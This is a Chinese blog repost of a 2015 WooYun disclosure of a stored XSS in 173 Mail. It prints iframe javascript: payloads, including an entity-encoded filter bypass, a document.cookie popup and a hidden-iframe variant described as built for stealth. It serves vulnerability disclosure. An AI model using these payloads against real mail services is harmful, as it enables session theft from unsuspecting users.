记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

173邮箱存储型XSS无需点击自动触发(支持所有浏览器)

2015-06-10 17:10

邮箱链接:https://mail.173.com/

注册账号: 略

首先:经过一番邮件主题、发件人昵称、收件人昵称等多处输入测试,发现过滤的挺严没什么大问题。



其次:来到正文,发送如下payload

code 区域
<iframe src="javascript&colon;confirm(2)"></iframe>



打开邮件便可触发,同时这种姿势支持所有浏览器,如下图:

1.png



对应源代码如下图:

2.png



备注: 后来发现使用iframe标签正常姿势也可以触发,例如:

code 区域
<iframe src="javascript:alert(1)"></iframe>





再次:来弹一下cookie吧,发送如下内容:

code 区域
<iframe src="javascript:alert(document.cookie)"></iframe>



打开邮件便可看到如下景象:

3.png





最后:为了增加隐蔽性,隐藏iframe边框,构造如下完美payload:

code 区域
<iframe src="javascript:alert(/xss/)" style="display:none"></iframe>













漏洞证明:

邮件内容发送如上完美payload,见下图:

4.png

修复方案:

过滤,再过滤 ……

知识来源: www.wooyun.org/bugs/wooyun-2015-0110408

阅读:94707 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“173邮箱存储型XSS无需点击自动触发(支持所有浏览器)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云